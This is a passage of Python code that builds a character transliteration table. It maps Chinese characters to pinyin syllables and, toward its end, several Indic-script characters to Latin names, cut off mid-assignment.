u\"gen\"\n for char in u\"耕更庚羹埂耿梗\":\n self.trans[char] = u\"geng\"\n for char in u\"工攻功恭龚供躬公宫弓巩汞拱贡共\":\n self.trans[char] = u\"gong\"\n for char in u\"钩勾沟苟狗垢构购够\":\n self.trans[char] = u\"gou\"\n for char in u\"辜菇咕箍估沽孤姑鼓古蛊骨谷股故顾固雇\":\n self.trans[char] = u\"gu\"\n for char in u\"刮瓜剐寡挂褂\":\n self.trans[char] = u\"gua\"\n for char in u\"乖拐怪\":\n self.trans[char] = u\"guai\"\n for char in u\"棺关官冠观管馆罐惯灌贯\":\n self.trans[char] = u\"guan\"\n for char in u\"光广逛\":\n self.trans[char] = u\"guang\"\n for char in u\"瑰规圭硅归龟闺轨鬼诡癸桂柜跪贵刽\":\n self.trans[char] = u\"gui\"\n for char in u\"辊滚棍\":\n self.trans[char] = u\"gun\"\n for char in u\"锅郭国果裹过\":\n self.trans[char] = u\"guo\"\n self.trans['哈'] = 'ha'\n for char in u\"骸孩海氦亥害骇\":\n self.trans[char] = u\"hai\"\n for char in u\"酣憨邯韩含涵寒函喊罕翰撼捍旱憾悍焊汗汉\":\n self.trans[char] = u\"han\"\n for char in u\"夯杭航\":\n self.trans[char] = u\"hang\"\n for char in u\"壕嚎豪毫郝好耗号浩\":\n self.trans[char] = u\"hao\"\n for char in u\"呵喝荷菏核禾和何合盒貉阂河涸赫褐鹤贺\":\n self.trans[char] = u\"he\"\n for char in u\"嘿黑\":\n self.trans[char] = u\"hei\"\n for char in u\"痕很狠恨\":\n self.trans[char] = u\"hen\"\n for char in u\"哼亨横衡恒\":\n self.trans[char] = u\"heng\"\n for char in u\"轰哄烘虹鸿洪宏弘红\":\n self.trans[char] = u\"hong\"\n for char in u\"喉侯猴吼厚候后\":\n self.trans[char] = u\"hou\"\n for char in u\"呼乎忽瑚壶葫胡蝴狐糊湖弧虎唬护互沪户\":\n self.trans[char] = u\"hu\"\n for char in u\"花哗华猾滑画划化话\":\n self.trans[char] = u\"hua\"\n for char in u\"槐徊怀淮坏\":\n self.trans[char] = u\"huai\"\n for char in u\"欢环桓还缓换患唤痪豢焕涣宦幻\":\n self.trans[char] = u\"huan\"\n for char in u\"荒慌黄磺蝗簧皇凰惶煌晃幌恍谎\":\n self.trans[char] = u\"huang\"\n for char in u\"灰挥辉徽恢蛔回毁悔慧卉惠晦贿秽会烩汇讳诲绘\":\n self.trans[char] = u\"hui\"\n for char in u\"荤昏婚魂浑混\":\n self.trans[char] = u\"hun\"\n 
for char in u\"豁活伙火获或惑霍货祸\":\n self.trans[char] = u\"huo\"\n for char in u\"击圾基机畸稽积箕肌饥迹激讥鸡姬绩缉吉极棘辑籍集及急疾汲即嫉级挤几脊己蓟技冀季伎祭剂悸济寄寂计记既忌际妓继纪\":\n self.trans[char] = u\"ji\"\n for char in u\"嘉枷夹佳家加荚颊贾甲钾假稼价架驾嫁\":\n self.trans[char] = u\"jia\"\n for char in u\"歼监坚尖笺间煎兼肩艰奸缄茧检柬碱硷拣捡简俭剪减荐槛鉴践贱见键箭件健舰剑饯渐溅涧建\":\n self.trans[char] = u\"jian\"\n for char in u\"僵姜将浆江疆蒋桨奖讲匠酱降\":\n self.trans[char] = u\"jiang\"\n for char in u\"蕉椒礁焦胶交郊浇骄娇嚼搅铰矫侥脚狡角饺缴绞剿教酵轿较叫窖\":\n self.trans[char] = u\"jiao\"\n for char in u\"揭接皆秸街阶截劫节桔杰捷睫竭洁结解姐戒藉芥界借介疥诫届\":\n self.trans[char] = u\"jie\"\n for char in u\"巾筋斤金今津襟紧锦仅谨进靳晋禁近烬浸尽劲\":\n self.trans[char] = u\"jin\"\n for char in u\"荆兢茎睛晶鲸京惊精粳经井警景颈静境敬镜径痉靖竟竞净\":\n self.trans[char] = u\"jing\"\n for char in u\"囧炯窘\":\n self.trans[char] = u\"jiong\"\n for char in u\"揪究纠玖韭久灸九酒厩救旧臼舅咎就疚\":\n self.trans[char] = u\"jiu\"\n for char in u\"鞠拘狙疽居驹菊局咀矩举沮聚拒据巨具距踞锯俱句惧炬剧\":\n self.trans[char] = u\"ju\"\n for char in u\"捐鹃娟倦眷卷绢\":\n self.trans[char] = u\"juan\"\n for char in u\"撅攫抉掘倔爵觉决诀绝\":\n self.trans[char] = u\"jue\"\n for char in u\"均菌钧军君峻俊竣浚郡骏\":\n self.trans[char] = u\"jun\"\n for char in u\"喀咖卡咯\":\n self.trans[char] = u\"ka\"\n for char in u\"开揩楷凯慨\":\n self.trans[char] = u\"kai\"\n for char in u\"刊堪勘坎砍看\":\n self.trans[char] = u\"kan\"\n for char in u\"康慷糠扛抗亢炕\":\n self.trans[char] = u\"kang\"\n for char in u\"考拷烤靠\":\n self.trans[char] = u\"kao\"\n for char in u\"坷苛柯棵磕颗科壳咳可渴克刻客课\":\n self.trans[char] = u\"ke\"\n for char in u\"肯啃垦恳\":\n self.trans[char] = u\"ken\"\n for char in u\"坑吭\":\n self.trans[char] = u\"keng\"\n for char in u\"空恐孔控\":\n self.trans[char] = u\"kong\"\n for char in u\"抠口扣寇\":\n self.trans[char] = u\"kou\"\n for char in u\"枯哭窟苦酷库裤\":\n self.trans[char] = u\"ku\"\n for char in u\"夸垮挎跨胯\":\n self.trans[char] = u\"kua\"\n for char in u\"块筷侩快\":\n self.trans[char] = u\"kuai\"\n for char in u\"宽款\":\n self.trans[char] = u\"kuan\"\n for char in u\"匡筐狂框矿眶旷况\":\n self.trans[char] = u\"kuang\"\n for char in u\"亏盔岿窥葵奎魁傀馈愧溃\":\n self.trans[char] = u\"kui\"\n for char in u\"坤昆捆困\":\n self.trans[char] = u\"kun\"\n for char in u\"括扩廓阔\":\n self.trans[char] = u\"kuo\"\n for char in u\"垃拉喇蜡腊辣啦\":\n self.trans[char] = u\"la\"\n for char in u\"莱来赖\":\n self.trans[char] = u\"lai\"\n for char in u\"蓝婪栏拦篮阑兰澜谰揽览懒缆烂滥\":\n self.trans[char] = u\"lan\"\n for char in u\"琅榔狼廊郎朗浪\":\n self.trans[char] = u\"lang\"\n for char in u\"捞劳牢老佬姥酪烙涝\":\n self.trans[char] = u\"lao\"\n for char in u\"勒乐\":\n self.trans[char] = u\"le\"\n for char in u\"雷镭蕾磊累儡垒擂肋类泪\":\n self.trans[char] = u\"lei\"\n for char in u\"棱楞冷\":\n self.trans[char] = u\"leng\"\n for char in u\"厘梨犁黎篱狸离漓理李里鲤礼莉荔吏栗丽厉励砾历利傈例俐痢立粒沥隶力璃哩\":\n self.trans[char] = u\"li\"\n self.trans['俩'] = 'lia'\n for char in u\"联莲连镰廉怜涟帘敛脸链恋炼练\":\n self.trans[char] = u\"lian\"\n for char in u\"粮凉梁粱良两辆量晾亮谅\":\n self.trans[char] = u\"liang\"\n for char in u\"撩聊僚疗燎寥辽潦了撂镣廖料\":\n self.trans[char] = u\"liao\"\n for char in u\"列裂烈劣猎\":\n self.trans[char] = u\"lie\"\n for char in u\"琳林磷霖临邻鳞淋凛赁吝拎\":\n self.trans[char] = u\"lin\"\n for char in u\"玲菱零龄铃伶羚凌灵陵岭领另令\":\n self.trans[char] = u\"ling\"\n for char in u\"溜琉榴硫馏留刘瘤流柳六\":\n self.trans[char] = u\"liu\"\n for char in u\"龙聋咙笼窿隆垄拢陇\":\n self.trans[char] = u\"long\"\n for char in u\"楼娄搂篓漏陋\":\n self.trans[char] = u\"lou\"\n for char in u\"芦卢颅庐炉掳卤虏鲁麓碌露路赂鹿潞禄录陆戮泸\":\n self.trans[char] = u\"lu\"\n for char in u\"峦挛孪滦卵乱\":\n self.trans[char] = u\"luan\"\n for char in u\"掠略\":\n self.trans[char] = u\"lue\"\n for char in u\"抡轮伦仑沦纶论\":\n self.trans[char] = u\"lun\"\n for char in u\"萝螺罗逻锣箩骡裸落洛骆络漯\":\n self.trans[char] = u\"luo\"\n for char in 
u\"驴吕铝侣旅履屡缕虑氯律率滤绿\":\n self.trans[char] = u\"lv\"\n for char in u\"妈麻玛码蚂马骂嘛吗\":\n self.trans[char] = u\"ma\"\n for char in u\"埋买麦卖迈脉\":\n self.trans[char] = u\"mai\"\n for char in u\"瞒馒蛮满蔓曼慢漫谩\":\n self.trans[char] = u\"man\"\n for char in u\"芒茫盲氓忙莽\":\n self.trans[char] = u\"mang\"\n for char in u\"猫茅锚毛矛铆卯茂冒帽貌贸\":\n self.trans[char] = u\"mao\"\n self.trans['么'] = 'me'\n for char in u\"玫枚梅酶霉煤没眉媒镁每美昧寐妹媚\":\n self.trans[char] = u\"mei\"\n for char in u\"门闷们\":\n self.trans[char] = u\"men\"\n for char in u\"萌蒙檬盟锰猛梦孟\":\n self.trans[char] = u\"meng\"\n for char in u\"眯醚靡糜迷谜弥米秘觅泌蜜密幂\":\n self.trans[char] = u\"mi\"\n for char in u\"棉眠绵冕免勉娩缅面\":\n self.trans[char] = u\"mian\"\n for char in u\"苗描瞄藐秒渺庙妙\":\n self.trans[char] = u\"miao\"\n for char in u\"蔑灭\":\n self.trans[char] = u\"mie\"\n for char in u\"民抿皿敏悯闽\":\n self.trans[char] = u\"min\"\n for char in u\"明螟鸣铭名命\":\n self.trans[char] = u\"ming\"\n self.trans['谬'] = 'miu'\n for char in u\"摸摹蘑模膜磨摩魔抹末莫墨默沫漠寞陌\":\n self.trans[char] = u\"mo\"\n for char in u\"谋牟某\":\n self.trans[char] = u\"mou\"\n for char in u\"拇牡亩姆母墓暮幕募慕木目睦牧穆\":\n self.trans[char] = u\"mu\"\n for char in u\"拿哪呐钠那娜纳\":\n self.trans[char] = u\"na\"\n for char in u\"氖乃奶耐奈\":\n self.trans[char] = u\"nai\"\n for char in u\"南男难\":\n self.trans[char] = u\"nan\"\n self.trans['囊'] = 'nang'\n for char in u\"挠脑恼闹淖\":\n self.trans[char] = u\"nao\"\n self.trans['呢'] = 'ne'\n for char in u\"馁内\":\n self.trans[char] = u\"nei\"\n self.trans['嫩'] = 'nen'\n self.trans['能'] = 'neng'\n for char in u\"妮霓倪泥尼拟你匿腻逆溺\":\n self.trans[char] = u\"ni\"\n for char in u\"蔫拈年碾撵捻念\":\n self.trans[char] = u\"nian\"\n for char in u\"娘酿\":\n self.trans[char] = u\"niang\"\n for char in u\"鸟尿\":\n self.trans[char] = u\"niao\"\n for char in u\"捏聂孽啮镊镍涅\":\n self.trans[char] = u\"nie\"\n self.trans['您'] = 'nin'\n for char in u\"柠狞凝宁拧泞\":\n self.trans[char] = u\"ning\"\n for char in u\"牛扭钮纽\":\n self.trans[char] = u\"niu\"\n for char in u\"脓浓农弄\":\n self.trans[char] = u\"nong\"\n for char in u\"奴努怒\":\n self.trans[char] = u\"nu\"\n self.trans['暖'] = 'nuan'\n for char in u\"虐疟\":\n self.trans[char] = u\"nue\"\n for char in u\"挪懦糯诺\":\n self.trans[char] = u\"nuo\"\n self.trans['女'] = 'nv'\n self.trans['哦'] = 'o'\n for char in u\"欧鸥殴藕呕偶沤\":\n self.trans[char] = u\"ou\"\n for char in u\"啪趴爬帕怕琶\":\n self.trans[char] = u\"pa\"\n for char in u\"拍排牌徘湃派\":\n self.trans[char] = u\"pai\"\n for char in u\"攀潘盘磐盼畔判叛\":\n self.trans[char] = u\"pan\"\n for char in u\"乓庞旁耪胖\":\n self.trans[char] = u\"pang\"\n for char in u\"抛咆刨炮袍跑泡\":\n self.trans[char] = u\"pao\"\n for char in u\"呸胚培裴赔陪配佩沛\":\n self.trans[char] = u\"pei\"\n for char in u\"喷盆\":\n self.trans[char] = u\"pen\"\n for char in u\"砰抨烹澎彭蓬棚硼篷膨朋鹏捧碰\":\n self.trans[char] = u\"peng\"\n for char in u\"坯砒霹批披劈琵毗啤脾疲皮匹痞僻屁譬\":\n self.trans[char] = u\"pi\"\n for char in u\"篇偏片骗\":\n self.trans[char] = u\"pian\"\n for char in u\"飘漂瓢票\":\n self.trans[char] = u\"piao\"\n for char in u\"撇瞥\":\n self.trans[char] = u\"pie\"\n for char in u\"拼频贫品聘\":\n self.trans[char] = u\"pin\"\n for char in u\"乒坪苹萍平凭瓶评屏\":\n self.trans[char] = u\"ping\"\n for char in u\"坡泼颇婆破魄迫粕剖\":\n self.trans[char] = u\"po\"\n for char in u\"扑铺仆莆葡菩蒲埔朴圃普浦谱曝瀑濮\":\n self.trans[char] = u\"pu\"\n for char in u\"期欺栖戚妻七凄漆柒沏其棋奇歧畦崎脐齐旗祈祁骑起岂乞企启契砌器气迄弃汽泣讫\":\n self.trans[char] = u\"qi\"\n for char in u\"掐恰洽\":\n self.trans[char] = u\"qia\"\n for char in u\"牵扦钎铅千迁签仟谦乾黔钱钳前潜遣浅谴堑嵌欠歉\":\n self.trans[char] = u\"qian\"\n for char in u\"枪呛腔羌墙蔷强抢\":\n self.trans[char] = u\"qiang\"\n for char in u\"橇锹敲悄桥瞧乔侨巧鞘撬翘峭俏窍\":\n self.trans[char] = 
u\"qiao\"\n for char in u\"切茄且怯窃\":\n self.trans[char] = u\"qie\"\n for char in u\"钦侵亲秦琴勤芹擒禽寝沁\":\n self.trans[char] = u\"qin\"\n for char in u\"青轻氢倾卿清擎晴氰情顷请庆\":\n self.trans[char] = u\"qing\"\n for char in u\"琼穷\":\n self.trans[char] = u\"qiong\"\n for char in u\"秋丘邱球求囚酋泅\":\n self.trans[char] = u\"qiu\"\n for char in u\"趋区蛆曲躯屈驱渠取娶龋趣去\":\n self.trans[char] = u\"qu\"\n for char in u\"圈颧权醛泉全痊拳犬券劝\":\n self.trans[char] = u\"quan\"\n for char in u\"缺炔瘸却鹊榷确雀\":\n self.trans[char] = u\"que\"\n for char in u\"裙群\":\n self.trans[char] = u\"qun\"\n for char in u\"然燃冉染\":\n self.trans[char] = u\"ran\"\n for char in u\"瓤壤攘嚷让\":\n self.trans[char] = u\"rang\"\n for char in u\"饶扰绕\":\n self.trans[char] = u\"rao\"\n for char in u\"惹热\":\n self.trans[char] = u\"re\"\n for char in u\"壬仁人忍韧任认刃妊纫\":\n self.trans[char] = u\"ren\"\n for char in u\"扔仍\":\n self.trans[char] = u\"reng\"\n self.trans['日'] = 'ri'\n for char in u\"戎茸蓉荣融熔溶容绒冗\":\n self.trans[char] = u\"rong\"\n for char in u\"揉柔肉\":\n self.trans[char] = u\"rou\"\n for char in u\"茹蠕儒孺如辱乳汝入褥\":\n self.trans[char] = u\"ru\"\n for char in u\"软阮\":\n self.trans[char] = u\"ruan\"\n for char in u\"蕊瑞锐\":\n self.trans[char] = u\"rui\"\n for char in u\"闰润\":\n self.trans[char] = u\"run\"\n for char in u\"若弱\":\n self.trans[char] = u\"ruo\"\n for char in u\"撒洒萨\":\n self.trans[char] = u\"sa\"\n for char in u\"腮鳃塞赛\":\n self.trans[char] = u\"sai\"\n for char in u\"三叁伞散\":\n self.trans[char] = u\"san\"\n for char in u\"桑嗓丧\":\n self.trans[char] = u\"sang\"\n for char in u\"搔骚扫嫂\":\n self.trans[char] = u\"sao\"\n for char in u\"瑟色涩\":\n self.trans[char] = u\"se\"\n self.trans['森'] = 'sen'\n self.trans['僧'] = 'seng'\n for char in u\"莎砂杀刹沙纱傻啥煞\":\n self.trans[char] = u\"sha\"\n for char in u\"筛晒\":\n self.trans[char] = u\"shai\"\n for char in u\"珊苫杉山删煽衫闪陕擅赡膳善汕扇缮\":\n self.trans[char] = u\"shan\"\n for char in u\"墒伤商赏晌上尚裳\":\n self.trans[char] = u\"shang\"\n for char in u\"梢捎稍烧芍勺韶少哨邵绍\":\n self.trans[char] = u\"shao\"\n for char in u\"奢赊蛇舌舍赦摄射慑涉社设\":\n self.trans[char] = u\"she\"\n for char in u\"砷申呻伸身深娠绅神沈审婶甚肾慎渗\":\n self.trans[char] = u\"shen\"\n for char in u\"声生甥牲升绳省盛剩胜圣\":\n self.trans[char] = u\"sheng\"\n for char in u\"师失狮施湿诗尸虱十石拾时什食蚀实识史矢使屎驶始式示士世柿事拭誓逝势是嗜噬适仕侍释饰氏市恃室视试\":\n self.trans[char] = u\"shi\"\n for char in u\"收手首守寿授售受瘦兽\":\n self.trans[char] = u\"shou\"\n for char in u\"蔬枢梳殊抒输叔舒淑疏书赎孰熟薯暑曙署蜀黍鼠属术述树束戍竖墅庶数漱恕\":\n self.trans[char] = u\"shu\"\n for char in u\"刷耍\":\n self.trans[char] = u\"shua\"\n for char in u\"摔衰甩帅\":\n self.trans[char] = u\"shuai\"\n for char in u\"栓拴\":\n self.trans[char] = u\"shuan\"\n for char in u\"霜双爽\":\n self.trans[char] = u\"shuang\"\n for char in u\"谁水睡税\":\n self.trans[char] = u\"shui\"\n for char in u\"吮瞬顺舜\":\n self.trans[char] = u\"shun\"\n for char in u\"说硕朔烁\":\n self.trans[char] = u\"shuo\"\n for char in u\"斯撕嘶思私司丝死肆寺嗣四伺似饲巳\":\n self.trans[char] = u\"si\"\n for char in u\"松耸怂颂送宋讼诵\":\n self.trans[char] = u\"song\"\n for char in u\"搜艘擞\":\n self.trans[char] = u\"sou\"\n for char in u\"嗽苏酥俗素速粟僳塑溯宿诉肃\":\n self.trans[char] = u\"su\"\n for char in u\"酸蒜算\":\n self.trans[char] = u\"suan\"\n for char in u\"虽隋随绥髓碎岁穗遂隧祟\":\n self.trans[char] = u\"sui\"\n for char in u\"孙损笋\":\n self.trans[char] = u\"sun\"\n for char in u\"蓑梭唆缩琐索锁所\":\n self.trans[char] = u\"suo\"\n for char in u\"塌他它她塔獭挞蹋踏\":\n self.trans[char] = u\"ta\"\n for char in u\"胎苔抬台泰酞太态汰\":\n self.trans[char] = u\"tai\"\n for char in u\"坍摊贪瘫滩坛檀痰潭谭谈坦毯袒碳探叹炭\":\n self.trans[char] = u\"tan\"\n for char in u\"汤塘搪堂棠膛唐糖倘躺淌趟烫\":\n self.trans[char] = u\"tang\"\n for char in 
u\"掏涛滔绦萄桃逃淘陶讨套\":\n self.trans[char] = u\"tao\"\n self.trans['特'] = 'te'\n for char in u\"藤腾疼誊\":\n self.trans[char] = u\"teng\"\n for char in u\"梯剔踢锑提题蹄啼体替嚏惕涕剃屉\":\n self.trans[char] = u\"ti\"\n for char in u\"兲天添填田甜恬舔腆\":\n self.trans[char] = u\"tian\"\n for char in u\"挑条迢眺跳\":\n self.trans[char] = u\"tiao\"\n for char in u\"贴铁帖\":\n self.trans[char] = u\"tie\"\n for char in u\"厅听烃汀廷停亭庭挺艇\":\n self.trans[char] = u\"ting\"\n for char in u\"通桐酮瞳同铜彤童桶捅筒统痛\":\n self.trans[char] = u\"tong\"\n for char in u\"偷投头透\":\n self.trans[char] = u\"tou\"\n for char in u\"凸秃突图徒途涂屠土吐兔\":\n self.trans[char] = u\"tu\"\n for char in u\"湍团\":\n self.trans[char] = u\"tuan\"\n for char in u\"推颓腿蜕褪退\":\n self.trans[char] = u\"tui\"\n for char in u\"吞屯臀\":\n self.trans[char] = u\"tun\"\n for char in u\"拖托脱鸵陀驮驼椭妥拓唾\":\n self.trans[char] = u\"tuo\"\n for char in u\"挖哇蛙洼娃瓦袜\":\n self.trans[char] = u\"wa\"\n for char in u\"歪外\":\n self.trans[char] = u\"wai\"\n for char in u\"豌弯湾玩顽丸烷完碗挽晚皖惋宛婉万腕莞\":\n self.trans[char] = u\"wan\"\n for char in u\"汪王亡枉网往旺望忘妄\":\n self.trans[char] = u\"wang\"\n for char in u\"威巍微危韦违桅围唯惟为潍维苇萎委伟伪尾纬未蔚味畏胃喂魏位渭谓尉慰卫\":\n self.trans[char] = u\"wei\"\n for char in u\"瘟温蚊文闻纹吻稳紊问\":\n self.trans[char] = u\"wen\"\n for char in u\"嗡翁瓮\":\n self.trans[char] = u\"weng\"\n for char in u\"挝蜗涡窝我斡卧握沃\":\n self.trans[char] = u\"wo\"\n for char in u\"巫呜钨乌污诬屋无芜梧吾吴毋武五捂午舞伍侮坞戊雾晤物勿务悟误\":\n self.trans[char] = u\"wu\"\n for char in u\"昔熙析西硒矽晰嘻吸锡牺稀息希悉膝夕惜熄烯溪汐犀檄袭席习媳喜铣洗系隙戏细\":\n self.trans[char] = u\"xi\"\n for char in u\"瞎虾匣霞辖暇峡侠狭下厦夏吓\":\n self.trans[char] = u\"xia\"\n for char in u\"掀锨先仙鲜纤咸贤衔舷闲涎弦嫌显险现献县腺馅羡宪陷限线\":\n self.trans[char] = u\"xian\"\n for char in u\"相厢镶香箱襄湘乡翔祥详想响享项巷橡像向象\":\n self.trans[char] = u\"xiang\"\n for char in u\"萧硝霄削哮嚣销消宵淆晓小孝校肖啸笑效\":\n self.trans[char] = u\"xiao\"\n for char in u\"楔些歇蝎鞋协挟携邪斜胁谐写械卸蟹懈泄泻谢屑\":\n self.trans[char] = u\"xie\"\n for char in u\"薪芯锌欣辛新忻心信衅\":\n self.trans[char] = u\"xin\"\n for char in u\"星腥猩惺兴刑型形邢行醒幸杏性姓\":\n self.trans[char] = u\"xing\"\n for char in u\"兄凶胸匈汹雄熊\":\n self.trans[char] = u\"xiong\"\n for char in u\"休修羞朽嗅锈秀袖绣\":\n self.trans[char] = u\"xiu\"\n for char in u\"墟戌需虚嘘须徐许蓄酗叙旭序畜恤絮婿绪续\":\n self.trans[char] = u\"xu\"\n for char in u\"轩喧宣悬旋玄选癣眩绚\":\n self.trans[char] = u\"xuan\"\n for char in u\"靴薛学穴雪血\":\n self.trans[char] = u\"xue\"\n for char in u\"勋熏循旬询寻驯巡殉汛训讯逊迅\":\n self.trans[char] = u\"xun\"\n for char in u\"压押鸦鸭呀丫芽牙蚜崖衙涯雅哑亚讶\":\n self.trans[char] = u\"ya\"\n for char in u\"焉咽阉烟淹盐严研蜒岩延言颜阎炎沿奄掩眼衍演艳堰燕厌砚雁唁彦焰宴谚验\":\n self.trans[char] = u\"yan\"\n for char in u\"殃央鸯秧杨扬佯疡羊洋阳氧仰痒养样漾\":\n self.trans[char] = u\"yang\"\n for char in u\"邀腰妖瑶摇尧遥窑谣姚咬舀药要耀\":\n self.trans[char] = u\"yao\"\n for char in u\"椰噎耶爷野冶也页掖业叶曳腋夜液\":\n self.trans[char] = u\"ye\"\n for char in u\"一壹医揖铱依伊衣颐夷遗移仪胰疑沂宜姨彝椅蚁倚已乙矣以艺抑易邑屹亿役臆逸肄疫亦裔意毅忆义益溢诣议谊译异翼翌绎\":\n self.trans[char] = u\"yi\"\n for char in u\"茵荫因殷音阴姻吟银淫寅饮尹引隐印\":\n self.trans[char] = u\"yin\"\n for char in u\"英樱婴鹰应缨莹萤营荧蝇迎赢盈影颖硬映\":\n self.trans[char] = u\"ying\"\n self.trans['哟'] = 'yo'\n for char in u\"拥佣臃痈庸雍踊蛹咏泳涌永恿勇用\":\n self.trans[char] = u\"yong\"\n for char in u\"幽优悠忧尤由邮铀犹油游酉有友右佑釉诱又幼迂\":\n self.trans[char] = u\"you\"\n for char in u\"淤于盂榆虞愚舆余俞逾鱼愉渝渔隅予娱雨与屿禹宇语羽玉域芋郁吁遇喻峪御愈欲狱育誉浴寓裕预豫驭\":\n self.trans[char] = u\"yu\"\n for char in u\"鸳渊冤元垣袁原援辕园员圆猿源缘远苑愿怨院\":\n self.trans[char] = u\"yuan\"\n for char in u\"曰约越跃钥岳粤月悦阅\":\n self.trans[char] = u\"yue\"\n for char in u\"耘云郧匀陨允运蕴酝晕韵孕\":\n self.trans[char] = u\"yun\"\n for char in u\"匝砸杂\":\n self.trans[char] = u\"za\"\n for char in u\"栽哉灾宰载再在\":\n self.trans[char] = u\"zai\"\n for char in u\"咱攒暂赞\":\n 
self.trans[char] = u\"zan\"\n for char in u\"赃脏葬\":\n self.trans[char] = u\"zang\"\n for char in u\"遭糟凿藻枣早澡蚤躁噪造皂灶燥\":\n self.trans[char] = u\"zao\"\n for char in u\"责择则泽\":\n self.trans[char] = u\"ze\"\n self.trans['贼'] = 'zei'\n self.trans['怎'] = 'zen'\n for char in u\"增憎曾赠\":\n self.trans[char] = u\"zeng\"\n for char in u\"扎喳渣札轧铡闸眨栅榨咋乍炸诈\":\n self.trans[char] = u\"zha\"\n for char in u\"摘斋宅窄债寨\":\n self.trans[char] = u\"zhai\"\n for char in u\"瞻毡詹粘沾盏斩辗崭展蘸栈占战站湛绽\":\n self.trans[char] = u\"zhan\"\n for char in u\"樟章彰漳张掌涨杖丈帐账仗胀瘴障\":\n self.trans[char] = u\"zhang\"\n for char in u\"招昭找沼赵照罩兆肇召\":\n self.trans[char] = u\"zhao\"\n for char in u\"遮折哲蛰辙者锗蔗这浙\":\n self.trans[char] = u\"zhe\"\n for char in u\"珍斟真甄砧臻贞针侦枕疹诊震振镇阵圳\":\n self.trans[char] = u\"zhen\"\n for char in u\"蒸挣睁征狰争怔整拯正政帧症郑证\":\n self.trans[char] = u\"zheng\"\n for char in u\"芝枝支吱蜘知肢脂汁之织职直植殖执值侄址指止趾只旨纸志挚掷至致置帜峙制智秩稚质炙痔滞治窒\":\n self.trans[char] = u\"zhi\"\n for char in u\"中盅忠钟衷终种肿重仲众\":\n self.trans[char] = u\"zhong\"\n for char in u\"舟周州洲诌粥轴肘帚咒皱宙昼骤\":\n self.trans[char] = u\"zhou\"\n for char in u\"珠株蛛朱猪诸诛逐竹烛煮拄瞩嘱主著柱助蛀贮铸筑住注祝驻\":\n self.trans[char] = u\"zhu\"\n for char in u\"抓爪\":\n self.trans[char] = u\"zhua\"\n self.trans['拽'] = 'zhuai'\n for char in u\"专砖转撰赚篆\":\n self.trans[char] = u\"zhuan\"\n for char in u\"桩庄装妆撞壮状\":\n self.trans[char] = u\"zhuang\"\n for char in u\"椎锥追赘坠缀\":\n self.trans[char] = u\"zhui\"\n for char in u\"谆准\":\n self.trans[char] = u\"zhun\"\n for char in u\"捉拙卓桌琢茁酌啄着灼浊\":\n self.trans[char] = u\"zhuo\"\n for char in u\"兹咨资姿滋淄孜紫仔籽滓子自渍字\":\n self.trans[char] = u\"zi\"\n for char in u\"鬃棕踪宗综总纵\":\n self.trans[char] = u\"zong\"\n for char in u\"邹走奏揍\":\n self.trans[char] = u\"zou\"\n for char in u\"租足卒族祖诅阻组\":\n self.trans[char] = u\"zu\"\n for char in u\"钻纂\":\n self.trans[char] = u\"zuan\"\n for char in u\"嘴醉最罪\":\n self.trans[char] = u\"zui\"\n for char in u\"尊遵\":\n self.trans[char] = u\"zun\"\n for char in u\"昨左佐柞做作坐座\":\n self.trans[char] = u\"zuo\"\n # from: https://www.wikidata.org/wiki/MediaWiki:Gadget-SimpleTransliterate.js\n self.trans[u\"ଂ\"] = \"anusvara\"\n self.trans[u\"ઇ\"] = \"i\"\n self.trans[u\"എ\"] = \"e\"\n self.trans[u\"ગ\"] = \"ga\"\n self.trans[u\"ਜ\"] = \"ja\"\n self.trans[u\"ഞ\"] = \"nya\"\n self.trans[u\"ଢ\"] = \"ddha\"\n self.trans[u\"ધ\"] = \"dha\"\n self.trans[u\"ਬ\"] = \"ba\"\n self.trans[u\"മ\"] = \"ma\"\n self.trans[u\"ଲ\"] = \"la\"\n self.trans[u\"ષ\"] = \"ssa\"\n self.trans[u\"਼\"] = \"nukta\"\n self.trans[u\"ാ\"] = \"aa\"\n self.trans[u\"ୂ\"] = \"uu\"\n self.trans[u\"ે\"] = \"e\"\n self.trans[u\"ੌ\"] = \"au\"\n self.trans[u\"ൎ\"] = \"reph\"\n self.trans[u\"ੜ\"] = \"rra\"\n self.trans[u\"՞\"] = \"?\"\n self.trans[u\"ୢ\"] = \"l\"\n self.trans[u\"૧\"] = \"1\"\n self.trans[u\"੬\"] = \"6\"\n self.trans[u\"൮\"] = \"8\"\n self.trans[u\"୲\"] = \"quarter\"\n self.trans[u\"ൾ\"] = \"ll\"\n self.trans[u\"ਇ\"] = \"i\"\n self.trans[u\"ഉ\"] = \"u\"\n self.trans[u\"ઌ\"] = \"l\"\n self.trans[u\"ਗ\"] = \"ga\"\n self.trans[u\"ങ\"] = \"nga\"\n self.trans[u\"ଝ\"] = \"jha\"\n self.trans[u\"જ\"] = \"ja\"\n self.trans[u\"؟\"] = \"?\"\n self.trans[u\"ਧ\"] = \"dha\"\n self.trans[u\"ഩ\"] = \"nnna\"\n self.trans[u\"ଭ\"] = \"bha\"\n self.trans[u\"બ\"] = \"ba\"\n self.trans[u\"ഹ\"] = \"ha\"\n self.trans[u\"ଽ\"] = \"avagraha\"\n self.trans[u\"઼\"] = \"nukta\"\n self.trans[u\"ੇ\"] = \"ee\"\n self.trans[u\"୍\"] = \"virama\"\n self.trans[u\"ૌ\"] = \"au\"\n self.trans[u\"੧\"] = \"1\"\n self.trans[u\"൩\"] = \"3\"\n self.trans[u\"୭\"] = \"7\"\n self.trans[u\"૬\"] = \"6\"\n self.trans[u\"൹\"] = \"mark\"\n 
self.trans[u\"ਖ਼\"] = \"khha\"\n self.trans[u\"ਂ\"] = \"bindi\"\n self.trans[u\"ഈ\"] = \"ii\"\n self.trans[u\"ઍ\"] = \"e\"\n self.trans[u\"ଌ\"] = \"l\"\n self.trans[u\"ഘ\"] = \"gha\"\n self.trans[u\"ઝ\"] = \"jha\"\n self.trans[u\"ଡ଼\"] = \"rra\"\n self.trans[u\"ਢ\"] = \"ddha\"\n self.trans[u\"ന\"] = \"na\"\n self.trans[u\"ભ\"] = \"bha\"\n self.trans[u\"ବ\"] = \"ba\"\n self.trans[u\"ਲ\"] = \"la\"\n self.trans[u\"സ\"] = \"sa\"\n self.trans[u\"ઽ\"] = \"avagraha\"\n self.trans[u\"଼\"] = \"nukta\"\n self.trans[u\"ੂ\"] = \"uu\"\n self.trans[u\"ൈ\"] = \"ai\"\n self.trans[u\"્\"] = \"virama\"\n self.trans[u\"ୌ\"] = \"au\"\n self.trans[u\"൨\"] = \"2\"\n self.trans[u\"૭\"] = \"7\"\n self.trans[u\"୬\"] = \"6\"\n self.trans[u\"ੲ\"] = \"iri\"\n self.trans[u\"ഃ\"] = 